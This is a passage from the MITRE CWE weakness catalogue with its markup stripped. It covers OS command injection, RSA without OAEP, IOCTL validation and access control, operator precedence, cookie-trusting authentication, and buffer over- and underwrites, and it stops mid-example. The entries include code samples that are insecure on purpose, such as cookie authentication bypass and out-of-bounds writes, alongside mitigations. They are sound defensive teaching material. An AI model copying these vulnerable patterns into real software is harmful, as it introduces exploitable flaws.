UNIX "find" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78. - More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Terminology_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Name, Related_Attack_Patterns - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Name, White_Box_Definitions - - - CWE Content Team - MITRE - 2009-10-29 - updated Observed_Examples, References - - - CWE Content Team - MITRE - 2009-12-28 - updated Detection_Factors - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Applicable_Platforms, Demonstrative_Examples, Terminology_Notes - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples, Relationships - - OS Command Injection - Failure to Sanitize Data into an OS Command (aka 'OS Command Injection') - Failure to Preserve OS Command Structure (aka 'OS Command Injection') - Failure to Preserve OS Command Structure ('OS Command Injection') - Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection') - - - - The software uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption. - Padding schemes are often used with cryptographic algorithms to make the plaintext less predictable and complicate attack efforts. The OAEP scheme is often used with RSA to nullify the impact of predictable common text. - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Access Control - Bypass Protection Mechanism - Without OAEP in RSA encryption, it will take less work for an attacker to decrypt the data or to infer patterns from the ciphertext. - - - - - The example below attempts to build an RSA cipher. - - public Cipher getRSACipher() {Cipher rsa = null;try {rsa = javax.crypto.Cipher.getInstance("RSA/NONE/NoPadding");}catch (java.security.NoSuchAlgorithmException e) {log("this should never happen", e);}catch (javax.crypto.NoSuchPaddingException e) {log("this should never happen", e);}return rsa;} - - While the previous code successfully creates an RSA cipher, the cipher does not use padding. The following code creates an RSA cipher using OAEP. - - public Cipher getRSACipher() {Cipher rsa = null;try {rsa = javax.crypto.Cipher.getInstance("RSA/ECB/OAEPWithMD5AndMGF1Padding");}catch (java.security.NoSuchAlgorithmException e) {log("this should never happen", e);}catch (javax.crypto.NoSuchPaddingException e) {log("this should never happen", e);}return rsa;} - - - - - - - - - This entry could probably have a new parent related to improper padding, however the role of padding in cryptographic algorithms can vary, such as hiding the length of the plaintext and providing additional random bits for the cipher. In general, cryptographic problems in CWE are not well organized and further research is needed. - - - - Fortify Software - 2009-07-08 - Based on information from Fortify Software. - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software defines an IOCTL that uses METHOD_NEITHER for I/O, but it does not validate or incorrectly validates the addresses that are provided. - When an IOCTL uses the METHOD_NEITHER option for I/O control, it is the responsibility of the IOCTL to validate the addresses that have been supplied to it. If validation is missing or incorrect, attackers can supply arbitrary memory addresses, leading to code execution or a denial of service. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Availability - Confidentiality - Modify Memory - Read Memory - Execute Unauthorized Code or Commands - DoS: Crash, Exit, or Restart - An attacker may be able to access memory that belongs to another process or user. If the attacker can control the contents that the IOCTL writes, it may lead to code execution at high privilege levels. At the least, a crash can occur. - - - - - Implementation - If METHOD_NEITHER is required for the IOCTL, then ensure that all user-space addresses are properly validated before they are first accessed. The ProbeForRead and ProbeForWrite routines are available for this task. Also properly protect and manage the user-supplied buffers, since the I/O Manager does not do this when METHOD_NEITHER is being used. See References. - - - Architecture and Design - If possible, avoid using METHOD_NEITHER in the IOCTL and select methods that effectively control the buffer size, such as METHOD_BUFFERED, METHOD_IN_DIRECT, or METHOD_OUT_DIRECT. - - - Architecture and Design - Implementation - If the IOCTL is part of a driver that is only intended to be accessed by trusted users, then use proper access control for the associated device or device namespace. See References. - - - - - CVE-2006-2373 - Driver for file-sharing and messaging protocol allows attackers to execute arbitrary code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2373 - - - CVE-2009-0686 - Anti-virus product does not validate addresses, allowing attackers to gain SYSTEM privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0686 - - - CVE-2009-0824 - DVD software allows attackers to cause a crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0824 - - - CVE-2008-5724 - Personal firewall allows attackers to gain SYSTEM privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5724 - - - CVE-2007-5756 - chain: device driver for packet-capturing software allows access to an unintended IOCTL with resultant array index error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5756 - - - - - - - - - - - - - - Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages. - - - While this type of issue has been known since 2006, it is probably still under-studied and under-reported. Most of the focus has been on high-profile software and security products, but other kinds of system software also use drivers. Since exploitation requires the development of custom code, it requires some skill to find this weakness. - Because exploitation typically requires local privileges, it might not be a priority for active attackers. However, remote exploitation may be possible for software such as device drivers. Even when remote vectors are not available, it may be useful as the final privilege-escalation step in multi-stage remote attacks against application-layer software, or as the primary attack by a local user on a multi-user system. - - - - - CWE Content Team - MITRE - 2009-07-15 - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Potential_Mitigations, References, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Likelihood_of_Exploit, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - - - The software implements an IOCTL with functionality that should be restricted, but it does not properly enforce access control for the IOCTL. - - When an IOCTL contains privileged functionality and is exposed unnecessarily, attackers may be able to access this functionality by invoking the IOCTL. Even if the functionality is benign, if the programmer has assumed that the IOCTL would only be accessed by a trusted process, there may be little or no validation of the incoming data, exposing weaknesses that would never be reachable if the attacker cannot call the IOCTL directly. - The implementations of IOCTLs will differ between operating system types and versions, so the methods of attack and prevention may vary widely. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Availability - Confidentiality - Attackers can invoke any functionality that the IOCTL offers. Depending on the functionality, the consequences may include code execution, denial-of-service, and theft of data. - - - - - Architecture and Design - In Windows environments, use proper access control for the associated device or device namespace. See References. - - - - - CVE-2009-2208 - Operating system does not enforce permissions on an IOCTL that can be used to modify network settings. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2208 - - - CVE-2008-3831 - Device driver does not restrict ioctl calls to its direct rendering manager. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3831 - - - CVE-2008-3525 - ioctl does not check for a required capability before processing certain requests. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3525 - - - CVE-2008-0322 - Chain: insecure device permissions allows access to an IOCTL, allowing arbitrary memory to be overwritten. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0322 - - - CVE-2007-4277 - Chain: anti-virus product uses weak permissions for a device, leading to resultant buffer overflow in an exposed IOCTL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4277 - - - CVE-2007-1400 - Chain: sandbox allows opening of a TTY device, enabling shell commands through an exposed ioctl. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1400 - - - CVE-2006-4926 - Anti-virus product uses insecure security descriptor for a device driver, allowing access to a privileged IOCTL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4926 - - - CVE-1999-0728 - Unauthorized user can disable keyboard or mouse by directly invoking a privileged IOCTL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0728 - - - - - - - This can be primary to many other weaknesses when the programmer assumes that the IOCTL can only be accessed by trusted parties. For example, a program or driver might not validate incoming addresses in METHOD_NEITHER IOCTLs in Windows environments (CWE-781), which could allow buffer overflow and similar attacks to take place, even when the attacker never should have been able to access the IOCTL at all. - - Because IOCTL functionality is typically performing low-level actions and closely interacts with the operating system, this weakness may only appear in code that is written in low-level languages. - - - - - CWE Content Team - MITRE - 2009-07-15 - - - CWE Content Team - MITRE - 2009-12-28 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2017-11-08 - updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Observed_Examples - - - - - The program uses an expression in which operator precedence causes incorrect logic to be used. - While often just a bug, operator precedence logic errors can have serious consequences if they are used in security-critical code, such as making an authentication decision. - - - - - - - - - - - Implementation - Logic errors related to operator precedence may cause problems even during normal operation, so they are probably discovered quickly during the testing phase. If testing is incomplete or there is a strong reliance on manual review of the code, then these errors may not be discovered before the software is deployed. - - - Low - - - Confidentiality - Integrity - Availability - Varies by Context - Unexpected State - The consequences will vary based on the context surrounding the incorrect precedence. In a security decision, integrity or confidentiality are the most likely results. Otherwise, a crash may occur due to the software reaching an unexpected state. - - - - - Implementation - Regularly wrap sub-expressions in parentheses, especially in security-critical code. - - - - - In the following example, the method validateUser makes a call to another method to authenticate a username and password for a user and returns a success or failure code. - - #define FAIL 0#define SUCCESS 1 - ... - int validateUser(char *username, char *password) { - - int isUser = FAIL; - - // call method to authenticate username and password - - - // if authentication fails then return failure otherwise return success - if (isUser = AuthenticateUser(username, password) == FAIL) {return isUser;}else {isUser = SUCCESS;} - return isUser; - } - - However, the method that authenticates the username and password is called within an if statement with incorrect operator precedence logic. Because the comparison operator "==" has a higher precedence than the assignment operator "=", the comparison operator will be evaluated first and if the method returns FAIL then the comparison will be true, the return variable will be set to true and SUCCESS will be returned. This operator precedence logic error can be easily resolved by properly using parentheses within the expression of the if statement, as shown below. - - ... - if ((isUser = AuthenticateUser(username, password)) == FAIL) { - ... - - - - In this example, the method calculates the return on investment for an accounting/financial application. The return on investment is calculated by subtracting the initial investment costs from the current value and then dividing by the initial investment costs. - - public double calculateReturnOnInvestment(double currentValue, double initialInvestment) { - - double returnROI = 0.0; - - // calculate return on investment - returnROI = currentValue - initialInvestment / initialInvestment; - return returnROI; - } - - However, the return on investment calculation will not produce correct results because of the incorrect operator precedence logic in the equation. The divide operator has a higher precedence than the minus operator, therefore the equation will divide the initial investment costs by the initial investment costs which will only subtract one from the current value. Again this operator precedence logic error can be resolved by the correct use of parentheses within the equation, as shown below. - - ... - returnROI = (currentValue - initialInvestment) / initialInvestment; - ... - - Note that the initialInvestment variable in this example should be validated to ensure that it is greater than zero to avoid a potential divide by zero error (CWE-369). - - - - - CVE-2008-2516 - Authentication module allows authentication bypass because it uses "(x = call(args) == SUCCESS)" instead of "((x = call(args)) == SUCCESS)". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2516 - - - CVE-2008-0599 - Chain: Language interpreter calculates wrong buffer size (CWE-131) by using "size = ptr ? X : Y" instead of "size = (ptr ? X : Y)" expression. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599 - - - CVE-2001-1155 - Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155 - - - - - EXP00-C - Use parentheses for precedence of operation - Exact - - - EXP04-PL - Do not mix the early-precedence logical operators with late-precedence logical operators - CWE More Abstract - - - - - - - - - CWE Content Team - MITRE - 2009-07-16 - - - CWE Content Team - MITRE - 2009-12-28 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings, Time_of_Introduction - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - The application uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user. - Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Attackers can bypass protection mechanisms such as authorization and authentication by modifying the cookie to contain an expected value. - - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - High - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - It is dangerous to use cookies to set a user's privileges. The cookie can be manipulated to claim a high level of authorization, or to claim that successful authentication has occurred. - - - - - Architecture and Design - Avoid using cookie data for a security-related decision. - - - Implementation - Perform thorough input validation (i.e.: server side validation) on the cookie data if you're going to use it for a security related decision. - - - Architecture and Design - Add integrity checks to detect tampering. - - - Architecture and Design - Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client. - - - - - The following code excerpt reads a value from a browser cookie to determine the role of the user. - - Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("role")) {userRole = c.getValue();}} - - - - The following code could be for a medical records application. It performs authentication by checking if a cookie has been set. - - $auth = $_COOKIES['authenticated'];if (! $auth) {if (AuthenticateUser($_POST['user'], $_POST['password']) == "success") {// save the cookie to send out in future responsessetcookie("authenticated", "1", time()+60*60*2);}else {ShowLoginScreen();die("\n");}}DisplayMedicalHistory($_POST['patient_ID']); - - The programmer expects that the AuthenticateUser() check will always be applied, and the "authenticated" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. - However, the attacker can set the "authenticated" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication. - - - In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. - - Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) {authenticated = true;}} - - - - - - CVE-2009-1549 - Attacker can bypass authentication by setting a cookie to a specific value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1549 - - - CVE-2009-1619 - Attacker can bypass authentication and gain admin privileges by setting an "admin" cookie to 1. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1619 - - - CVE-2009-0864 - Content management system allows admin privileges by setting a "login" cookie to "OK." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0864 - - - CVE-2008-5784 - e-dating application allows admin privileges by setting the admin cookie to 1. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5784 - - - CVE-2008-6291 - Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to "admin." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6291 - - - - - - - - A new parent might need to be defined for this entry. This entry is specific to cookies, which reflects the significant number of vulnerabilities being reported for cookie-based authentication in CVE during 2008 and 2009. However, other types of inputs - such as parameters or headers - could also be used for similar authentication or authorization. Similar issues (under the Research view) include CWE-247 and CWE-472. - - - - CWE Content Team - MITRE - 2009-07-16 - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - - - The software invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX. - Passing an inadequately-sized output buffer to a path manipulation function can result in a buffer overflow. Such functions include realpath(), readlink(), PathAppend(), and others. - - - - - - - - - - - Windows provides a large number of utility functions that manipulate buffers containing filenames. In most cases, the result is returned in a buffer that is passed in as input. (Usually the filename is modified in place.) Most functions require the buffer to be at least MAX_PATH bytes in length, but you should check the documentation for each function individually. If the buffer is not large enough to store the result of the manipulation, a buffer overflow can occur. - - - - Implementation - - - - - Integrity - Confidentiality - Availability - Modify Memory - Execute Unauthorized Code or Commands - DoS: Crash, Exit, or Restart - - - - - Implementation - Always specify output buffers large enough to handle the maximum-size possible result from path manipulation functions. - - - - - In this example the function creates a directory named "output\<name>" in the current directory and returns a heap-allocated copy of its name. - - char *createOutputDirectory(char *name) { - char outputDirectoryName[128];if (getCurrentDirectory(128, outputDirectoryName) == 0) {return null;}if (!PathAppend(outputDirectoryName, "output")) {return null;}if (!PathAppend(outputDirectoryName, name)) { - - return null; - }if (SHCreateDirectoryEx(NULL, outputDirectoryName, NULL) != ERROR_SUCCESS) { - - return null; - }return StrDup(outputDirectoryName); - } - - For most values of the current directory and the name parameter, this function will work properly. However, if the name parameter is particularly long, then the second call to PathAppend() could overflow the outputDirectoryName buffer, which is smaller than MAX_PATH bytes. - - - - Memory - File or Directory - - - - Often Misused: File System - - - SFP9 - Faulty String Expansion - - - - - - - This entry is at a much lower level of abstraction than most entries because it is function-specific. It also has significant overlap with other entries that can vary depending on the perspective. For example, incorrect usage could trigger either a stack-based overflow (CWE-121) or a heap-based overflow (CWE-122). The CWE team has not decided how to handle such entries. - - - - 7 Pernicious Kingdoms - 2009-07-27 - Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified before initial publication. - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Demonstrative_Examples, Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - - - The software reads or writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer. - This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. - - - - - - - - Confidentiality - Read Memory - For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences. - - - Integrity - Availability - Modify Memory - DoS: Crash, Exit, or Restart - Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. - - - Integrity - Modify Memory - Execute Unauthorized Code or Commands - If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy. - - - - - In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character. - - char* trimTrailingWhitespace(char *strMessage, int length) { - char *retMessage;char *message = malloc(sizeof(char)*(length+1)); - - // copy input string to a temporary string - char message[length+1];int index;for (index = 0; index < length; index++) {message[index] = strMessage[index];}message[index] = '\0'; - - // trim trailing whitespace - int len = index-1;while (isspace(message[len])) {message[len] = '\0';len--;} - - // return string without trailing whitespace - retMessage = message;return retMessage; - } - - However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer. - - - The following example asks a user for an offset into an array to select an item. - - - int main (int argc, char **argv) {char *items[] = {"boat", "car", "truck", "train"};int index = GetUntrustedOffset();printf("You selected %s\n", items[index-1]);} - - The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). - - - The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf: - - int main() {...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...} - - If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition. - - - - - CVE-2002-2227 - Unchecked length of SSLv2 challenge value leads to buffer underflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227 - - - CVE-2007-4580 - Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580 - - - CVE-2007-1584 - Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1584 - - - CVE-2007-0886 - Buffer underflow resultant from encoded data that triggers an integer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0886 - - - CVE-2006-6171 - Product sets an incorrect buffer size limit, leading to "off-by-two" buffer underflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171 - - - CVE-2006-4024 - Negative value is used in a memcpy() operation, leading to buffer underflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4024 - - - CVE-2004-2620 - Buffer underflow due to mishandled special characters - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2620 - - - - - ARR30-C - Do not form or use out-of-bounds pointers or array subscripts - CWE More Specific - - - - - CWE Content Team - MITRE - 2009-10-21 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The software writes data past the end, or before the beginning, of the intended buffer. - Typically, this can result in corruption of data, a crash, or code execution. The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer. A subsequent write operation then produces undefined or unexpected results. - - - - - - - - - - - - - - Memory Corruption - The generic term "memory corruption" is often used to describe the consequences of writing to memory outside the bounds of a buffer, or to memory that is invalid, when the root cause is something other than a sequential copy of excessive data from a fixed starting location. This may include issues such as incorrect pointer arithmetic, accessing invalid pointers due to incomplete initialization or memory release, etc. - - - - - Implementation - - - High - - - Integrity - Availability - Modify Memory - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - - - - - Automated Static Analysis - - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. - - High - Detection techniques for buffer-related errors are more mature than for most other weakness types. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. - Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe. - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. - - This is not a complete solution, since many buffer overflows are not related to strings. - - - Build and Compilation - Compilation or Build Hardening - - Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows. - For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice. - - Defense in Depth - This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Implementation - - Consider adhering to the following rules when allocating and managing an application's memory: - - - Double check that the buffer is as large as specified. - When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. - Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. - If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions. - - - - - - Operation - Environment Hardening - - Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. - Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. - - Defense in Depth - This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Environment Hardening - Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61]. - Defense in Depth - This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Implementation - Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. - Moderate - This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). - - - - - The following code attempts to save four different identification numbers into an array. - - int id_sequence[3]; - /* Populate the id array. */ - id_sequence[0] = 123;id_sequence[1] = 234;id_sequence[2] = 345;id_sequence[3] = 456; - - Since the array is only allocated to hold three elements, the valid indices are 0 to 2; so, the assignment to id_sequence[3] is out of bounds. - - - In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: - - int returnChunkSize(void *) { - - - /* if chunk 